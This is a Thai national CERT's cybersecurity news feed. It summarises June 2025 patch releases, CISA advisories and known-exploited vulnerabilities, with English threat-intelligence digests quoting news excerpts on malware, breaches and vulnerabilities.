สามารถติดตามข่าวสารได้ที่ webboard หรือ Facebook NCSA Thailand 
โพสต์ถูกสร้างโดย NCSA_THAICERT
-
SAP ออกแพตช์มิถุนายน 2025 แก้ช่องโหว่ NetWeaverโพสต์ใน Cyber Security News
-
Google อุดช่องโหว่ร้ายแรงที่เสี่ยงต่อข้อมูลเบอร์โทรศัพท์ผู้ใช้งานรั่วไหลโพสต์ใน Cyber Security News
สามารถติดตามข่าวสารได้ที่ webboard หรือ Facebook NCSA Thailand
-
June 2025 Monthly Patchโพสต์ใน Cyber Security News
เมื่อวันที่ 11 มิถุนายน 2568 Cyber Security Agency of Singapore (CSA)ได้เผยแพร่เกี่ยวกับ การอัปเดตแพตช์รายเดือนของ Microsoft เพื่อแก้ไขช่องโหว่ด้านความมั่นคงปลอดภัยหลายรายการ ดังนี้
Microsoft ปล่อยแพตช์ใหม่เพื่ออุดช่องโหว่บนผลิตภัณฑ์ต่างๆ ที่ถูกจัดความร้ายแรงระดับ Critical (คะแนน 8.1–9.8) โดยเฉพาะช่องโหว่บน:- Power Automate (CVE‑2025‑47966) – ปัญหาสิทธิ์ยกระดับ สูงสุด 9.8
- SharePoint Server (CVE‑2025‑47172) – รันโค้ดระยะไกล 8.8
- Microsoft Word และ Office หลายรายการ – RCE (คะแนน ~8.4)
- Windows Schannel, RDS, Netlogon, KPSSVC – ช่องโหว่ระดับ RCE และ EoP คะแนน 8.1
รายละเอียดแพตช์ทั้งหมดสามารถดูเพิ่มเติมได้ที่ Microsoft Security Guidance (release note มิถุนายน 2568)
คำแนะนำสำหรับผู้ดูแลระบบอัปเดตแพตช์ทันที โดยเฉพาะหากใช้งานผลิตภัณฑ์ด้านล่าง:- Microsoft Word, Office (รวมถึง SharePoint Server), Power Automate
- Windows Remote Desktop Services, Schannel, Netlogon, KDC Proxy Service (KPSSVC)
- ตรวจสอบระบบหลังติดตั้งแพตช์ เพื่อความแน่ใจว่าไม่มีผลกระทบต่อการทำงานปกติ
- เสริมวงจรการจัดการแพตช์ ให้เป็นไปตามแนวทางปฏิบัติด้านความมั่นคงปลอดภัย เช่น การทดสอบ เครื่องขึ้น และตรวจสอบอย่างสม่ำเสมอ
ช่องโหว่เหล่านี้มีความร้ายแรงสูงและอาจเปิดช่องให้เกิดการโจมตีจากภายนอก (remote code execution หรือ escalation of privileges) ซึ่งอาจนำไปสู่การถูกเข้าควบคุมระบบหรือขโมยข้อมูลสำคัญ การอัปเดตแพตช์อย่างทันท่วงทีจึงมีความสำคัญอย่างมาก
อ้างอิง
https://www.csa.gov.sg/alerts-and-advisories/alerts/al-2025-058/สามารถติดตามข่าวสารได้ที่ webboard หรือ Facebook NCSA Thailand
-
Sensata Technologies แจ้งสาเหตุข้อมูลส่วนบุคคลรั่วไหลจากการโจมตีด้วยแรนซัมแวร์โพสต์ใน Cyber Security News
สามารถติดตามข่าวสารได้ที่ webboard หรือ Facebook NCSA Thailand
-
OpenAI แบนบัญชี ChatGPT ที่เชื่อมโยงกับกลุ่มภัยคุกคามไซเบอร์โพสต์ใน Cyber Security News
สามารถติดตามข่าวสารได้ที่ webboard หรือ Facebook NCSA Thailand
-
CISA ออกคำแนะนำเกี่ยวกับระบบควบคุมอุตสาหกรรม 7 รายการโพสต์ใน OT Cyber Security News
Cybersecurity and Infrastructure Security Agency (CISA) ได้เผยแพร่คำแนะนำเกี่ยวกับระบบควบคุมอุตสาหกรรม (ICS) 7 รายการ เมื่อวันที่ 5 มิถุนายน 2568 ซึ่งคำแนะนำเหล่านี้ให้ข้อมูลที่ทันท่วงทีเกี่ยวกับปัญหาด้านความปลอดภัยช่องโหว่ และช่องโหว่ที่อยู่รอบ ๆ ICS ในปัจจุบัน มีดังต่อไปนี้
ICSA-25-155-01 CyberData 011209 SIP Emergency Intercom
ICSA-25-155-02 Hitachi Energy Relion 670, 650 series and SAM600-IO Product
ICSA-21-049-02 Mitsubishi Electric FA Engineering Software Products (Update H)
ICSA-25-133-02 Hitachi Energy Relion 670/650/SAM600-IO Series (Update A)
ICSA-23-068-05 Hitachi Energy Relion 670, 650 and SAM600-IO Series (Update A)
ICSA-21-336-05 Hitachi Energy Relion 670/650/SAM600-IO (Update A)
ICSA-23-089-01 Hitachi Energy IEC 61850 MMS-Server (Update A)ทั้งนี้ CISA สนับสนุนให้ผู้ใช้และผู้ดูแลระบบตรวจสอบคำแนะนำ ICS ที่เผยแพร่ใหม่สำหรับรายละเอียดทางเทคนิคและการบรรเทาผลกระทบ https://www.cisa.gov/news-events/alerts/2025/06/05/cisa-releases-seven-industrial-control-systems-advisories
สามารถติดตามข่าวสารได้ที่ webboard หรือ Facebook NCSA Thailand
-
CISA เพิ่มช่องโหว่ที่ถูกใช้ประโยชน์ที่ทราบแล้ว 2 รายการลงในแค็ตตาล็อกโพสต์ใน Cyber Security News
เมื่อวันที่ 10 มิถุนาย 2568 Cybersecurity and Infrastructure Security Agency (CISA) ได้มีการเผยแพร่การเพิ่มช่องโหว่ใหม่ 2 รายการในแค็ตตาล็อก ช่องโหว่อาจเป็นที่รู้จักของกลุ่มแฮกเกอร์ ซึ่งการเพิ่มนี้ขึ้นอยู่กับข้อมูลของการแสวงหาผลประโยชน์จากการโจมตีช่องโหว่ดังกล่าวนั้นได้ ช่องโหว่เหล่านี้เป็นการโจมตีบ่อยครั้งสำหรับผู้ที่ไม่ประสงค์ดีด้านภัยคุกคามทางไซเบอร์และก่อให้เกิดความเสี่ยงที่สำคัญต่อองค์กรนั้นได้ มีรายละเอียดดังนี้
- CVE-2025-24016 Wazuh Server Deserialization of Untrusted Data Vulnerability
- CVE-2025-33053 Web Distributed Authoring and Versioning (WebDAV) External Control of File Name or Path Vulnerability
อ้างอิง
https://www.cisa.gov/news-events/alerts/2025/06/10/cisa-adds-two-known-exploited-vulnerabilities-catalog
สามารถติดตามข่าวสารได้ที่ webboard หรือ Facebook NCSA Thailand
-
CISA ออกคำแนะนำเกี่ยวกับระบบควบคุมอุตสาหกรรม 4 รายการโพสต์ใน OT Cyber Security News
Cybersecurity and Infrastructure Security Agency (CISA) ได้เผยแพร่คำแนะนำเกี่ยวกับระบบควบคุมอุตสาหกรรม (ICS) 4 รายการ เมื่อวันที่ 10 มิถุนายน 2568 ซึ่งคำแนะนำเหล่านี้ให้ข้อมูลที่ทันท่วงทีเกี่ยวกับปัญหาด้านความปลอดภัยช่องโหว่ และช่องโหว่ที่อยู่รอบ ๆ ICS ในปัจจุบัน มีดังต่อไปนี้
ICSA-25-160-01 SinoTrack GPS Receiver
ICSA-25-160-02 Hitachi Energy Relion 670, 650, SAM600-IO Series
ICSMA-25-160-01 MicroDicom DICOM Viewer
ICSA-25-140-11 Assured Telematics Inc (ATI) Fleet Management System (Update A)ทั้งนี้ CISA สนับสนุนให้ผู้ใช้และผู้ดูแลระบบตรวจสอบคำแนะนำ ICS ที่เผยแพร่ใหม่สำหรับรายละเอียดทางเทคนิคและการบรรเทาผลกระทบ รายละเอียดเพิ่มเติมที่ https://www.cisa.gov/news-events/alerts/2025/06/10/cisa-releases-four-industrial-control-systems-advisories
อ้างอิง
https://www.cisa.gov/news-events/alerts/2025/06/10/cisa-releases-four-industrial-control-systems-advisories
สามารถติดตามข่าวสารได้ที่ webboard หรือ Facebook NCSA Thailand
-
Cyber Threat Intelligence 11 June 2025โพสต์ใน Cyber Security News
Financial Sector
- DDoS Attacks On Financial Sector Surge In Scale And Sophistication
"The financial industry has been particularly affected by large-scale distributed denial-of-service (DDoS) attacks for years, but the recent escalating sophistication of these attacks marks a shift, according to the Financial Services Information Sharing and Analysis Center (FS-ISAC). In a report published on June 10, in collaboration with Akamai, the financial sector’s threat intelligence sharing body revealed that the industry has experienced an almost exponential rise in DDoS attacks between 2014 and 2024. From a residual amount of monthly volumetric DDoS attacks in 2014, the sector faced a peak of almost 350 events in October 2024 – with each event including hundreds, millions or billions of individual malicious requests."
https://www.infosecurity-magazine.com/news/ddos-financial-sector-surge/
Healthcare Sector
- MicroDicom DICOM Viewer
"Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on affected installations of DICOM Viewer."
https://www.cisa.gov/news-events/ics-medical-advisories/icsma-25-160-01
Industrial Sector
- SinoTrack GPS Receiver
"Successful exploitation of these vulnerabilities could allow an attacker to access device profiles without authorization through the common web management interface. Access to the device profile may allow an attacker to perform some remote functions on connected vehicles such as tracking the vehicle location and disconnecting power to the fuel pump where supported."
https://www.cisa.gov/news-events/ics-advisories/icsa-25-160-01 - Threat Landscape For Industrial Automation Systems. Regions, Q1 2025
"In the first quarter of 2025, the global percentage of ICS computers on which malicious objects were blocked remained unchanged at 21.9%. Regionally, the percentage varied from 10.7% in Northern Europe to 29.6% in Africa."
https://ics-cert.kaspersky.com/publications/reports/2025/06/10/threat-landscape-for-industrial-automation-systems-regions-q1-2025/ - Hitachi Energy Relion 670, 650, SAM600-IO Series
"Successful exploitation of this vulnerability could allow an attacker to decrypt application data in transit."
https://www.cisa.gov/news-events/ics-advisories/icsa-25-160-02
Vulnerabilities
- SAP Security Notes: June 2025 Patch Day
"SAP has published nineteen new and updated SAP Security Notes in its June Patch Day, including two HotNews Notes and seven High Priority Notes. Two of the fourteen new Security Notes were published in contribution with the Onapsis Research Labs."
https://onapsis.com/blog/sap-security-notes-june-2025-patch-day/
https://www.securityweek.com/critical-vulnerability-patched-in-sap-netweaver/
https://securityaffairs.com/178851/security/sap-june-2025-security-patch-day-fixed-critical-netweaver-bug.html - Microsoft June 2025 Patch Tuesday Fixes Exploited Zero-Day, 66 Flaws
"Today is Microsoft's June 2025 Patch Tuesday, which includes security updates for 66 flaws, including one actively exploited vulnerability and another that was publicly disclosed. This Patch Tuesday also fixes ten "Critical" vulnerabilities, eight being remote code execution vulnerabilities and two being elevation of privileges bugs."
https://www.bleepingcomputer.com/news/microsoft/microsoft-june-2025-patch-tuesday-fixes-exploited-zero-day-66-flaws/
https://blog.talosintelligence.com/microsoft-patch-tuesday-june-2025/
https://cyberscoop.com/microsoft-patch-tuesday-june-2025/
https://www.securityweek.com/microsoft-patch-tuesday-covers-webdav-flaw-marked-as-already-exploited/
https://hackread.com/june-2025-patch-tuesday-microsoft-bugs-active-0-day/ - Five Zero-Days, 15 Misconfigurations Found In Salesforce Industry Cloud
"Security researchers have discovered five zero-day vulnerabilities and a further 15 easy misconfigurations in Salesforce Industry Cloud, potentially affecting tens of thousands of organizations. Salesforce Industry Cloud (aka Salesforce Industries) comprises a collection of industry-specific tools able to easily build custom CRM extension solutions for different industry sectors – such as healthcare, financial services, manufacturing, communications, and government public sector organizations. The process is built on the technology Salesforce acquired with its purchase of Vlocity in June 2020 and the use of OmniStudio low-code tools."
https://www.securityweek.com/five-zero-days-15-misconfigurations-found-in-salesforce-industry-cloud/
https://go.appomni.com/hubfs/Research/Salesforce-Industry-Clouds-Low-Code-High-Stakes.pdf
https://thehackernews.com/2025/06/researchers-uncover-20-configuration.html - Code Execution Flaws Haunt Adobe Acrobat Reader, Adobe Commerce
"Software maker Adobe on Tuesday flagged critical-severity flaws in multiple product lines, including code execution bugs in Adobe Acrobat Reader and Adobe Commerce. The bumper Patch Tuesday rollout is headlined by an Acrobat Reader bulletin that documents at least 10 vulnerabilities affecting both Windows and macOS platforms. According to Adobe, four of the 10 bugs are rated critical with a CVSS severity score of 7.8/10."
https://www.securityweek.com/code-execution-flaws-haunt-adobe-acrobat-reader-adobe-commerce/
https://thehackernews.com/2025/06/adobe-releases-patch-fixing-254.html - CISA Adds Two Known Exploited Vulnerabilities To Catalog
"CISA has added two new vulnerabilities to its Known Exploited Vulnerabilities (KEV) Catalog, based on evidence of active exploitation.
CVE-2025-24016 Wazuh Server Deserialization of Untrusted Data Vulnerability
CVE-2025-33053 Web Distributed Authoring and Versioning (WebDAV) External Control of File Name or Path Vulnerability"
https://www.cisa.gov/news-events/alerts/2025/06/10/cisa-adds-two-known-exploited-vulnerabilities-catalog - Another Crack In The Chain Of Trust: Uncovering (Yet Another) Secure Boot Bypass
"In this blog post, the Binarly Research team documents a Secure Boot bypass that likely impacts most devices supporting UEFI. At the center of this discovery is CVE-2025-3052 (BRLY-2025-001), a memory corruption vulnerability in a module signed with Microsoft’s third-party UEFI certificate. Attackers can exploit this vulnerability to run unsigned code during the boot process, effectively bypassing Secure Boot and compromising the system’s chain of trust. Because the attacker’s code executes before the operating system even loads, it opens the door for attackers to install bootkits and undermine OS-level security defenses."
https://www.binarly.io/blog/another-crack-in-the-chain-of-trust
https://www.bleepingcomputer.com/news/security/new-secure-boot-flaw-lets-attackers-install-bootkit-malware-patch-now/ - Ivanti Workspace Control Hardcoded Key Flaws Expose SQL Credentials
"Ivanti has released security updates to fix three high-severity hardcoded key vulnerabilities in the company's Workspace Control (IWC) solution. IWC helps enterprise admins manage desktops and applications, acting as an intermediary between the operating system and users and regulating access and workspace configuration. It provides centralized control over user workspaces and dynamically configures desktops, applications, and user settings based on policies and user roles."
https://www.bleepingcomputer.com/news/security/ivanti-workspace-control-hardcoded-key-flaws-expose-sql-credentials/ - Android Enterprise Rolls Out Security And Productivity Updates
"Android Enterprise has announced a range of new features aimed at improving mobile security, streamlining device management and enhancing user productivity. The updates come as more businesses rely on mobile platforms for daily operations, raising the stakes for both usability and cybersecurity."
https://www.infosecurity-magazine.com/news/android-enterprise-security-updates/
Malware
-
The Evolution Of Linux Binaries In Targeted Cloud Operations
"Unit 42 researchers have identified a growing threat to cloud security: Linux Executable and Linkage Format (ELF) files that threat actors are developing to target cloud infrastructure. We predict that threat actors targeting cloud environments will start using more complex tools in their exploits. This will include reworking, improving and tailoring existing tools that historically only targeted Linux operating systems (OS). The ELF malware samples threat actors use will include backdoors, droppers, remote access Trojans (RATs), data wipers and vulnerability-exploiting binaries."
https://unit42.paloaltonetworks.com/elf-based-malware-targets-cloud/ -
Eggs In a Cloudy Basket: Skeleton Spider’s Trusted Cloud Malware Delivery
"Skeleton Spider, also known as FIN6, is a long-running financially motivated cybercrime group that has continually evolved its tactics to maximize impact and profit. While the group initially gained notoriety for point-of-sale (POS) breaches and large-scale payment card theft, it has since shifted to broader enterprise threats, including ransomware operations. In recent years, FIN6 has sharpened its focus on social engineering campaigns that exploit professional trust. By posing as job seekers and initiating conversations through platforms like LinkedIn and Indeed, the group builds rapport with recruiters before delivering phishing messages that lead to malware. One of their preferred payloads is more_eggs, a stealthy JavaScript-based backdoor that facilitates credential theft, system access, and follow-on attacks, including ransomware deployment."
https://dti.domaintools.com/Skeleton-Spider-Trusted-Cloud-Malware-Delivery/
https://www.bleepingcomputer.com/news/security/fin6-hackers-pose-as-job-seekers-to-backdoor-recruiters-devices/
https://thehackernews.com/2025/06/fin6-uses-aws-hosted-fake-resumes-on.html -
Inside Stealth Falcon’s Espionage Campaign Using a Microsoft Zero-Day
"The operation deployed a sophisticated custom loader and implant designed to evade detection, hinder analysis, and selectively activate only on valuable targets. In March 2025, Check Point Research uncovered an attempted cyber attack against a major defense organization in Turkey. The attackers used a previously unknown remote code execution vulnerability in Windows to execute files from a remote WebDAV server they controlled, exploiting a legitimate built-in Windows tool to run malicious code silently. Following responsible disclosure, Microsoft assigned the vulnerability CVE-2025-33053 and released a patch on June 10, 2025, as part of their monthly Patch Tuesday updates."
https://blog.checkpoint.com/research/inside-stealth-falcons-espionage-campaign-using-a-microsoft-zero-day/
https://therecord.media/microsoft-cisa-zero-day-turkish-defense-org
https://www.darkreading.com/vulnerabilities-threats/stealth-falcon-apt-exploits-microsoft-rce-zero-day-mideast -
Demystifying Myth Stealer: A Rust Based InfoStealer
"During regular proactive threat hunting, the Trellix Advanced Research Center identified a fully undetected infostealer malware sample written in Rust. Upon further investigation, we discovered that it was Myth Stealer which was being marketed on Telegram since late December 2024. Initially, it was offered for free for trial, and later evolved to a subscription-based model. Our investigation revealed that this infostealer is distributed through various fraudulent gaming websites. Upon execution, the malware displays a fake window to appear legitimate while simultaneously decrypting and executing malicious code in the background."
https://www.trellix.com/en-in/blogs/research/demystifying-myth-stealer-a-rust-based-infostealer/
https://thehackernews.com/2025/06/rust-based-myth-stealer-malware-spread.html -
Breaches/Hacks/Leaks
Peep Show: 40K IoT Cameras Worldwide Stream Secrets To Anyone With a Browser
"Security researchers managed to access the live feeds of 40,000 internet-connected cameras worldwide and they may have only scratched the surface of what's possible. Supporting the bulletin issued by the Department of Homeland Security (DHS) earlier this year, which warned of exposed cameras potentially being used in Chinese espionage campaigns, the team at Bitsight was able to tap into feeds of sensitive locations. The US was the most affected region, with around 14,000 of the total feeds streaming from the country, allowing access to the inside of datacenters, healthcare facilities, factories, and more."
https://www.theregister.com/2025/06/10/40000_iot_cameras_exposed/ -
Mastery Schools Notifies 37,031 Of Major Data Breach
"A ransomware attack that compromised the personal data of 37,031 people has been confirmed by Mastery Schools, the largest charter school network in Philadelphia. The breach, which occurred in September 2024, exposed a wide range of sensitive information, including Social Security numbers, medical details and student records."
https://www.infosecurity-magazine.com/news/mastery-schools-data-breach/
General News
- The Legal Questions To Ask When Your Systems Go Dark
"At Span Cyber Security Arena, I sat down with Iva Mišković, Partner at the ISO-certified Mišković & Mišković law firm, to discuss the role of legal teams during cyber incidents. She shared why lawyers should assume the worst, coordinate quickly, and ask the right questions to support IT. Mišković explained that a legal strategy, built on understanding tech workflows, helps lawyers build trust with CISOs and respond to cyber threats."
https://www.helpnetsecurity.com/2025/06/10/iva-miskovic-law-firm-cyber-legal-stategy/ - AI Threats Leave SecOps Teams Burned Out And Exposed
"Security teams are leaning hard into AI, and fast. A recent survey of 500 senior cybersecurity pros at big U.S. companies found that 86% have ramped up their AI use in the past year. The main reason? They’re trying to keep up with a surge in AI-powered attacks. But even as AI tools help with tasks like threat detection and data analysis, the pressure on security teams is getting worse. Nearly 70% of respondents say AI and other emerging technologies are actually contributing to burnout. The findings come from the 2025 edition of the Voice of SecOps report, based on responses from organizations in finance, technology, manufacturing, healthcare, government, and critical infrastructure."
https://www.helpnetsecurity.com/2025/06/10/ai-powered-attacks-secops-teams/ - Cloud And AI Drive Efficiency, But Open Doors For Attackers
"AI adoption is increasing, with 84% of organizations now using AI in the cloud, according to Orca Security. But this innovation comes with new risks: 62% of organizations have at least one vulnerable AI package, and some of the most prevalent AI-related CVEs enable remote code execution. “While multi-cloud architectures offer outstanding flexibility and growth, it also makes it harder to maintain consistent visibility and coverage across environments. Add AI adoption to the mix, with organizations rushing to run vulnerable packages in the cloud, and you have a uniquely difficult environment for security professionals,” said Gil Geron, CEO, Orca Security."
https://www.helpnetsecurity.com/2025/06/10/ai-adoption-cloud-risks/ - Five Plead Guilty To Laundering $36 Million Stolen In Investment Scams
"Five men from China, the United States, and Turkey pleaded guilty to their involvement in an international crime ring and laundering nearly $37 million stolen from U.S. victims in cryptocurrency investment scams carried out from Cambodia. Accomplices living abroad reached out to targets in the United States via unsolicited social media, phone calls, text messages, and online dating services to gain their trust, promoting fraudulent digital asset investments and falsely claiming that the victims' funds' value increased after they tricked them into investing, when, in fact, their money was stolen."
https://www.bleepingcomputer.com/news/security/five-plead-guilty-to-laundering-36-million-stolen-in-investment-scams/
https://therecord.media/guilty-pleas-cambodia-cyber-scams - 44% Of People Encounter a Mobile Scam Every Single Day, Malwarebytes Finds
"It’s become so troublesome owning a phone. Malicious texts pose as package delivery notifications, phishing emails impersonate trusted brands, and unknown calls hide extortion attempts, virtual kidnapping schemes, or AI threats. Confusingly, even legitimate businesses now lean on outreach tactics that have long been favored by online scammers—asking people to scan QR codes, download mobile apps, and trade direct messages with, essentially, strangers."
https://www.malwarebytes.com/blog/scams/2025/06/44-of-people-encounter-a-mobile-scam-every-single-day-malwarebytes-finds - Email Threat Radar – June 2025
"During May, Barracuda threat analysts identified several notable email-based threats targeting organizations around the world and designed to evade detection and boost the chances of success, including:"
https://blog.barracuda.com/2025/06/10/email-threat-radar-june-2025 - The Hidden Threat In Your Stack: Why Non-Human Identity Management Is The Next Cybersecurity Frontier
"Modern enterprise networks are highly complex environments that rely on hundreds of apps and infrastructure services. These systems need to interact securely and efficiently without constant human oversight, which is where non-human identities (NHIs) come in. NHIs — including application secrets, API keys, service accounts, and OAuth tokens — have exploded in recent years, thanks to an ever-expanding array of apps and services that must work together and identify one another on the fly. In some enterprises, NHIs now outnumber human identities by as much as 50-to-1."
https://thehackernews.com/2025/06/the-hidden-threat-in-your-stack-why-non.html - Cyber Risks Take Flight, Navigating The Evolving Threat Landscape In The Travel Industry
"The global travel industry is flying high once again, but alongside its recovery comes a surge in digital turbulence. As travel demand surges and operations digitize at an unprecedented rate, cyber criminals are seizing new opportunities to exploit vulnerabilities in this data-rich, highly interconnected sector. A new report from Check Point shows that from 2023 to 2025, cyber attacks targeting travel and tour operators surged dramatically."
https://blog.checkpoint.com/research/cyber-risks-take-flight-navigating-the-evolving-threat-landscape-in-the-travel-industry/ - ConnectWise Rotating Code Signing Certificates Over Security Concerns
"ConnectWise is warning customers that it is rotating the digital code signing certificates used to sign ScreenConnect, ConnectWise Automate, and ConnectWise RMM executables over security concerns. Digital certificates are used to sign executables so those downloading the files know they come from a trusted source. This ensures that code has not been tampered with before it reaches the end user. According to ConnectWise, the decision was taken after a third-party security researcher raised concerns about how certain configuration data can be abused by threat actors."
https://www.bleepingcomputer.com/news/security/connectwise-rotating-code-signing-certificates-over-security-concerns/ - AI Is a Data-Breach Time Bomb, Reveals New Report
"AI is everywhere. Copilots help employees boost productivity, and agents provide front-line customer support. LLMs enable businesses to extract deep insights from their data. Once unleashed, however, AI acts like a hungry Pac-Man, scanning and analyzing all the data it can grab. If AI surfaces critical data where it doesn’t belong, it’s game over. Data can’t be unbreached. And AI isn’t alone — sprawling cloud complexities, unsanctioned apps, missing MFA, and more risks are creating a ticking time bomb for enterprise data. Organizations that lack proper data security measures risk a catastrophic breach of their sensitive information."
https://www.bleepingcomputer.com/news/security/ai-is-a-data-breach-time-bomb-reveals-new-report/
https://info.varonis.com/en/state-of-data-security-report-2025 - SSH Keys: The Most Powerful Credential You're Probably Ignoring
"Secure Shell (SSH) keys are the backbone of secure remote access. They are everywhere, powering DevOps pipelines, enabling server management, and automating everything from deployments to patching. But despite their ubiquity, SSH keys often remain a blind spot in enterprise security. Why? Because unlike passwords, they don't expire. They are easy to create, hard to track, and alarmingly simple to forget."
https://www.darkreading.com/vulnerabilities-threats/ssh-keys-powerful-credential-ignoring - Software Supply Chain Attacks Surged In April And May
"IT and software supply chain incidents have been trending higher in recent months, as threat actors have become more adept at exploiting the interconnected hardware, software, and services that comprise modern IT environments. An analysis of Cyble data reveals that software supply chain attacks have increased from an average of just under 13 a month during the eight months of February-September 2024 to just over 16 a month from October 2024 to May 2025, an increase of 25% in the most recent eight-month period. The last two months have averaged nearly 25 cyberattacks with supply chain impact, representing a near-doubling of supply chain attacks if the recent trend continues (chart below)."
https://cyble.com/blog/supply-chain-attacks-surge-in-april-may-2025/
อ้างอิง
Electronic Transactions Development Agency(ETDA)
- DDoS Attacks On Financial Sector Surge In Scale And Sophistication
-
FBI เตือน BadBox 2.0 แพร่ระบาดในอุปกรณ์ IoT หลายล้านเครื่องทั่วโลกโพสต์ใน Cyber Security News
สามารถติดตามข่าวสารได้ที่ webboard หรือ Facebook NCSA Thailand
-
มัลแวร์ Mirai เวอร์ชันใหม่โจมตีอุปกรณ์บันทึกวิดีโอยี่ห้อ TBKโพสต์ใน Cyber Security News
สามารถติดตามข่าวสารได้ที่ webboard หรือ Facebook NCSA Thailand
-
Cyber Threat Intelligence 10 June 2025โพสต์ใน Cyber Security News
New Tooling
- Fiddleitm: Open-Source Mitmproxy Add-On Identifies Malicious Web Traffic
"fiddleitm is an open-source tool built on top of mitmproxy that helps find malicious web traffic. It works by checking HTTP requests and responses for known patterns that might point to malware, phishing, or other threats. “I created fiddleitm because I needed a replacement for a similar project I ran for years using Fiddler. It needed to be cross platform compatible and highly extensible. This is a web proxy and debugging tool by a security researcher, for security researchers,” Jérôme Segura, the creator of the tool, told Help Net Security."
https://www.helpnetsecurity.com/2025/06/09/fiddleitm-open-source-mitmproxy-add-on-identify-malicious-web-traffic/
https://github.com/jeromesegura/fiddleitm
Vulnerabilities
- PayU Plugin Flaw Allows Account Takeover On 5000 WordPress Sites
"A critical vulnerability in the PayU CommercePro plugin has put thousands of WordPress sites at risk by allowing unauthenticated attackers to hijack user accounts, according to PatchStack. The flaw, discovered in version 3.8.5, stems from insecure logic in the /payu/v1/get-shipping-cost API route. Attackers can exploit this to impersonate any registered user, including site administrators, without needing login credentials."
https://www.infosecurity-magazine.com/news/payu-plugin-flaw-wordpress-account/
https://patchstack.com/database/wordpress/plugin/payu-india/vulnerability/wordpress-payu-india-plugin-3-8-5-account-takeover-vulnerability - Over 84,000 Roundcube Instances Vulnerable To Actively Exploited Flaw
"Over 84,000 Roundcube webmail installations are vulnerable to CVE-2025-49113, a critical remote code execution (RCE) flaw with a public exploit. The flaw, which impacts Roundcube versions 1.1.0 through 1.6.10, spanning over a decade, was patched on June 1, 2025, following its discovery and reporting by security researcher Kirill Firsov. The bug stems from unsanitized $_GET['_from'] input, enabling PHP object deserialization and session corruption when session keys begin with an exclamation mark."
https://www.bleepingcomputer.com/news/security/over-84-000-roundcube-instances-vulnerable-to-actively-exploited-flaw/
https://www.helpnetsecurity.com/2025/06/09/roundcube-rce-dark-web-activity-signals-imminent-attacks-cve-2025-49113/ - CISA Adds Two Known Exploited Vulnerabilities To Catalog
"CISA has added two new vulnerabilities to its Known Exploited Vulnerabilities (KEV) Catalog, based on evidence of active exploitation.
CVE-2025-32433 Erlang Erlang/OTP SSH Server Missing Authentication for Critical Function Vulnerability
CVE-2024-42009 RoundCube Webmail Cross-Site Scripting Vulnerability"
https://www.cisa.gov/news-events/alerts/2025/06/09/cisa-adds-two-known-exploited-vulnerabilities-catalog - Google Patched Bug Leaking Phone Numbers Tied To Accounts
"A vulnerability allowed researchers to brute-force any Google account's recovery phone number simply by knowing a their profile name and an easily retrieved partial phone number, creating a massive risk for phishing and SIM-swapping attacks. The attack method involves abusing a now-deprecated JavaScript-disabled version of the Google username recovery form, which lacked modern anti-abuse protections. The flaw was discovered by security researcher BruteCat, the same one who demonstrated in February that it's possible to expose the private email addresses of YouTube accounts."
https://www.bleepingcomputer.com/news/security/google-patched-bug-leaking-phone-numbers-tied-to-accounts/
Malware
- Follow The Smoke | China-Nexus Threat Actors Hammer At The Doors Of Top Tier Targets
"This research outlines threats that SentinelLABS observed and defended against in late 2024 and the first quarter of 2025. This post expands upon previous SentinelLABS research, which provides an overview of threats against cybersecurity vendors, including SentinelOne, ranging from financially motivated crimeware to targeted attacks by nation-state actors. This research focuses specifically on the subset of threats targeting SentinelOne and others that we attribute to China-nexus threat actors."
https://www.sentinelone.com/labs/follow-the-smoke-china-nexus-threat-actors-hammer-at-the-doors-of-top-tier-targets/
https://www.bleepingcomputer.com/news/security/sentinelone-shares-new-details-on-china-linked-breach-attempt/
https://thehackernews.com/2025/06/over-70-organizations-across-multiple.html
https://www.darkreading.com/remote-workforce/china-hackers-target-sentinelone-purplehaze-attack
https://www.bankinfosecurity.com/sentinelone-sees-no-breach-after-hardware-supplier-hacked-a-28626
https://www.securityweek.com/chinese-espionage-crews-circle-sentinelone-in-year-long-reconnaissance-campaign/
https://hackread.com/chinese-linked-hackers-targeted-global-organizations/
https://www.theregister.com/2025/06/09/china_malware_flip_switch_sentinelone/ - Ransomware Disguised As Password Cracker (Extension Changed To .NS1419)
"The AhnLab SEcurity intelligence Center (ASEC) recently discovered ransomware being distributed disguised a password cracker tool. Such tools are typically used in brute force attacks. Brute force attacks involve by trying every possible combination to find the correct password. Attackers repeatedly attempt to breach a system’s authentication procedure to steal passwords."
https://asec.ahnlab.com/en/88371/ - Two Botnets, One Flaw: Mirai Spreads Through Wazuh Vulnerability
"The Akamai SIRT discovered active exploitation of the remotely executable Wazuh unsafe deserialization vulnerability CVE-2025-24016 in late March 2025, just a few weeks after the vulnerability’s initial disclosure. Although the vulnerability has been public for months now, it has not yet been added to CISA’s Known Exploited Vulnerability (KEV) catalog, nor has active exploitation been previously reported. The Akamai SIRT identified two different botnets leveraging this exploit to spread variants of the Mirai malware to vulnerable target systems."
https://www.akamai.com/blog/security-research/botnets-flaw-mirai-spreads-through-wazuh-vulnerability
https://thehackernews.com/2025/06/botnet-wazuh-server-vulnerability.html
https://www.bankinfosecurity.com/mirai-botnets-exploit-flaw-in-unpatched-wazuh-servers-a-28624
https://www.securityweek.com/mirai-botnets-exploiting-wazuh-security-platform-vulnerability/ - May 2025 Malware Spotlight: SafePay Surges To The Forefront Of Cyber Threats
"Cyber criminals are becoming more brazen, and this month, research highlights the rise of SafePay, a relatively new but increasingly active ransomware group that has quickly established itself as a key player in the cyber crime ecosystem. Meanwhile, FakeUpdates remains a dominant force, continuing to impact global organizations at an alarming rate. The education sector remains the most targeted industry, illustrating persistent vulnerabilities across institutions."
https://blog.checkpoint.com/research/may-2025-malware-spotlight-safepay-surges-to-the-forefront-of-cyber-threats/ - Sleep With One Eye Open: How Librarian Ghouls Steal Data By Night
"Librarian Ghouls, also known as “Rare Werewolf” and “Rezet”, is an APT group that targets entities in Russia and the CIS. Other security vendors are also monitoring this APT and releasing analyses of its campaigns. The group has remained active through May 2025, consistently targeting Russian companies. A distinctive feature of this threat is that the attackers favor using legitimate third-party software over developing their own malicious binaries. The malicious functionality of the campaign described in this article is implemented through command files and PowerShell scripts. The attackers establish remote access to the victim’s device, steal credentials, and deploy an XMRig crypto miner in the system."
https://securelist.com/librarian-ghouls-apt-wakes-up-computers-to-steal-data-and-mine-crypto/116536/
https://www.darkreading.com/cyberattacks-data-breaches/librarian-ghouls-cyberattackers-strike - DanaBleed: DanaBot C2 Server Memory Leak Bug
